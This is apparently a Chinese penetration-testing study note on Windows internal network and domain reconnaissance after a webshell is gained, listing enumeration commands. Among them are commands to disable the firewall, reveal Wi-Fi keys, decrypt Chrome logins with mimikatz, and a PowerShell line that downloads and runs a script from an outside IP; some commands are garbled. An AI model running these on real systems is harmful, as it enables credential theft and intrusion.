Windows主机信息收集

一、内网环境分析

1、什么是内网渗透

内网渗透:

①在拿到webshell的时候，想办法获得系统信息拿到系统权限，进入到网络系统内部之后收集内部

网络的各种信息，获取内部网络有价值的人员、资产信息。

②内网渗透的第一步，内网信息收集。

2、内网基础环境分析

①内网基础环境判断

IP、网关、DNS、是否能连通外网、网络连接及端口、本机host文件、机器的代理、是否在域内，

域名是什么

②分析机器所处位置区域

DMZ区（隔离区，内外网连接）、办公区、生产区、核心DB等等

③分析机器的角色

普通WEB服务器、开发服务器、文件服务器、、代理服务器、DNS服务器、数据存储服务器等等

（判断是什么服务，存在何种关键信息）

④分析进出口流量是否能连通

协议的判断:常见的TCP、DNS、HTTP、ICMP等协议端口判断:外网vps做监听，内网机器测试常

见端口，常见能出去的端口有80,8080,443,53,110,123等。

判断示例：

3、工作组简介

工作组(Work Group):是最常见最简单最普通的资源管理模式，就是将不同的电脑按功能分别列入

不同的组中以方便管理。

①默认情况下所有计算机都处在名为WORKGROUP的工作组中

②工作组资源管理模式适合于网络中计算机不多，对管理要求不严格的情况。

③它的建立步骤简单，使用起来也很好上手。大部分中小公司都采取工作组的方式对资源进行权限

分配和目录共享

④相同组中的不同用户通过对方主机的用户名和密码可以査看对方共享的文件夹，默认共享的是

Users 目录。

⑤不同组的不同用户通过对方主机的用户名和密码也可以査看对方共享的文件夹。

⑥所以工作组并不存在真正的集中管理作用,工作组里的所有计算机都是对等的,也就是没有服务器

和客户机之分的。

右键此电脑——属性——域或工作组（机器加入域）

启用网络发现才能发现在同一个组中的机器（访问前提：知道用户名密码）

4、本机信息收集

操作系统、权限、内网IP地址段、杀软、端口、服务、补丁情况、网络环境情况、共享、会话等如

果是域内主机（域控，采用域一般是主机很多），那么操作系统、应用软件、补丁、服务、杀软一

般都是批量安装的。

5、内网网段信息收集

只有找到不同网段才能进行纵向渗透，否则只能横向渗透（10网段）

①内网网段扫描

②文件共享、FTP连接记录、浏览器访问记录、mstsc（远程桌面）连接记录

③渗透路由器、交换机

6、用户信息

①net user

②net localgroup administrators

③quser query user query user || qwinsta(家庭版无此命令，不要纠结)

④whoami/all

⑤whoami&&whoami/priv

⑥net localgroup

以下为解释：

7、系统信息

查询网络配置信息。进行IP地址段信息收集

①ipconfig/all

在域当中需着重注意DNS服务器，域控ip

查询操作系统及款件信息

②systeminfo|findstr /B /C:" OS Name" /C:"OS Version" //英文系统

systeminfo|findstr /B /C:" OS 名称" /C:"OS 版本" //中文系统

查看当前系统版本

③wmic OS get Caption,CSDVersion,OSArchitecture,Version

查看系统体系结构

④echo %PROCESSOR_ARCHITECTURE%

查询本机服务信息

⑤wmic service list brief

查看安装的软件的版本、路径等

⑥wmic product get name, version

powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name, version"

查询进程信息

⑦tasklist

wmic process list brief

查看启动程序信息(自启动)

⑧wmic startup get command,caption

查看计划任务(闹钟)

⑨at(windows10之前)

schtasks /query /fo LIST /v(win10)

查看主机开机时间

①net statustics workstation

列出或断开本地计算机与所连接的客户端的对话

②net session

查询端口列表,本机开放的端口所对应的服务和应用程序

③netstat -ano/-tnlp 常用 netstat -ano | findstr 端口

查看远程连接信息(用户访问凭据)

④cmdkey /L

查石补丁列表

⑤systeminfo | findstr KB

查看补丁的名称、描述、ID、安装时间等

⑥wmic qfe get Caption,Description,HotFixlD,InstalledOn

查看杀软

⑦WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName/Format:List

查看本地密码策略

⑧net accounts

查看hosts文件:

⑨Linux: cat /etc/hosts

Windows: type c:\Windows\system32\drivers\etc\hosts

查看dns缓存

⑩ipconfig /displaydns

查看本机所有的tcp,udp端口连接及其对应的pid

①netstat -ano

查看本机所有的tcp,udp端口连接,pid及其对应的发起程序

②netstat -anob

查看路由表和arp缓存

③route print
arp -a

8、网络信息

查看本机共享列表和可访问的域共享列表(445端口)

①net share
wmic share get name,path,status

磁盘映射

net use k:\\192.168.1.10\c$

远程主机c盘映射到本地主机E盘（未被占用盘）

9、防火墙信息

①关闭防火墙(Windows Server 2003 以前的版本)netsh firewall set opmode disable

②关闭防火墙(Windows Server 2003 以后的版本)netsh advfirewall set allprofiles state off

③查看防火墙配置(netsh命令也可以用作端口转发)netsh firewall show config

④查看配置规则netsh advfirewall firewall show rule name=all

10、代理信息

①REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer

通过pac文件自动代理情况

②REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL

11、wifi密码

netsh wlan show profile
netsh wlan show profile name="HUAWEI-MINGY" key=clear

12、回收站内容获取

FOR /F "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do dir /a /b C:$Recycle.Bin\%d\^>%c.txt

$I开头的文件保存的是路径信息

$R 开头的文件保存的是文件内容

目录路径在 C:\$Recycle.Bin

13、Chorme历史记录和Cookie获取

%localappdata%google\chrome\USERDA~1\default\LOGlND~1

%ocalappdata%google\chrome\USERDA~1\default\cookies

chrome的用户信息，保存在本地文件为sqlite 数据库格式

mimikatz.exe privilege::debug log "dpapi::chrome

/in:%ocalappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit
mimikatz.exe privilege:debug log "dpapi:chrome

需要mimikatz软件

/in:%ocalappdata%google\chrome\USERDA~1\defaultcookies /unprotect" exit

14、Powershell

FTP访问、共享连接、putty连接、驱动、应用程序、hosts 文件、进程、无线网络记录

powershell iex(new-object net.webclient),downloadstring(http://47,104.255.11:8000/Get-Information.ps1'”;GetInformation

15、msf信息收集

①run scraper
/root/.msf4/logs/scripts/scraper

②run winenum
/root/.msf4/logs/scripts/winenum

域用户免密码登录域控

不知道命令可以查看帮助信息或者百度（大部分可解决）

二、域内信息收集

1、域简介

①域(domain):域是一个有安全边界的计算机集合

②安全边界:在两个域中，一个域中的用户无法访问另一个域中的资源)

③将网络中多台计算机逻辑上组织到一起，进行集中管理，这种区别于工作组的逻辑环境叫做域，

域是组织与存储资源的核心管理单元，在域中，至少有一台域控制器，域控制器中保存着整个域的

用户帐号和安全数据库（批量）。（工作组只适合小规模）

④域成员计算机在登录的时候可以选择登录到域中或此计算机。

⑤登陆到域中的时候，身份验证是采用Kerberos协议在域控制器上进行的

⑥登陆到此计算机时，是通过SAM（存储在计算机本地上的文件）来进行NTLM验证的。

⑦默认情况下，域用户可以登录到域中所有的工作站，不包括域控制器，管理员也可以指定具体的

计算机，域用户信息保存在活动目录中。

⑧域控:DCDomain Control)（拿域控的一个权限）

a、在域架构中域控是用来管理所有客户端的服务器，它负责每一台联入的电脑和用户的验证工

作，域内电脑如果想互相访问首先都得经过它的审核。

b、域控是域架构的核心，每个域控制器上都包含了AD活动目录数据库。一个域中可能要有至少两

个域控。一个作为DC，一个是备份DC

⑨活动目录:AD(Active Directory)

a、域环境中提供目录服务的组件;

b、在活动目录中，所有的网络对象信息以一种结构化的数据存储方式来保存;

c、活动目录存储着有关网络对象的信息，如用户、组、计算机、共享资源、打印机和联系人等

d、安装有AD活动目录的服务器就是域控DC

用户可以通过AD活动目录定位到内网中的资源位置。

⑩活动目录主要功能:

a、帐号集中管理:所有帐号均存在服务器上，方便对帐号的重命名/重置密码。

b、软件集中管理:统一推送软件，统一安装网络打印机等。利用软件发布策略分发软件,可以让用户自由选择安装软件。

c、环境集中管理;利用AD可以统一客户兴察面，IE，TCP/IP等设置。

d、增强安全性:统一部署杀毒软件和扫毒任务，集中化管理用户的计算机权限、统一制订用户密码策略等，可监控网络，资料统一管理。

e、更可靠:更少的宕机时间，如:利用AD控制用户访问权限，利用群集、负均衡等技术对文件展进行容灾设定，更可靠，宕机时间更少。

活动目录为Microsoft统一管理的基础平台，其它ISA、Exchange、Ms 等服务都依赖于这个基础平台。

①DNS域名服务器:

a、域控服务器要求DNS服务器按名称查找计算机、成员服务器和网络服务。

b、域名解析:DNS服务器通过其A记录将域名解析成IP地址

c、定位活动目录服务:客户机通过DNS服务器上的 SRV服务记录定位提供基一个服务的计算机

2、登录域的方法

①域名\用户名（Adinistrator）密码（前提;有域）和登录到主机时不同的

②忘了

3、Net组件

①查询域 net view /domain

②查询域内的所有计算机 net view /domain:查询出的域名

③查询域内所有用户组(Enterprise Admins组权限最大) net group /domain

④查看域管理员的用户组 net group "domain admins" /domain

⑤查看域内所有账号 net user /domain

⑥查询指定用户的详情信息 net user xxx /domain

⑦查看时间可以找到域控 net time /domain

⑧查询所有域成员计算机列表net group "domain computers" /domain

⑨查询城系统管理员用户姐net group "Énterprise admins" /domain

⑩查看域控制器net group "domain controllers" /domain

①对比查看"工作站城DNS名称(域名)“和“登录城0域控制器”的信息是否相匹配

net config workstation

②查看域密码策略net accounts /domain

③查看当前登录域net config workstation

④登录本机的域管理员net localgroup administrators /domain

dns端口判断域控服务器

三、内网存活探测

Netbios协议探测

①nmap扫描

nmap sU -T4 -script nbstat.nse -p137 10.10.10.0/24

②msf扫描

msf>use auxiliary/scanner/netbios/nbname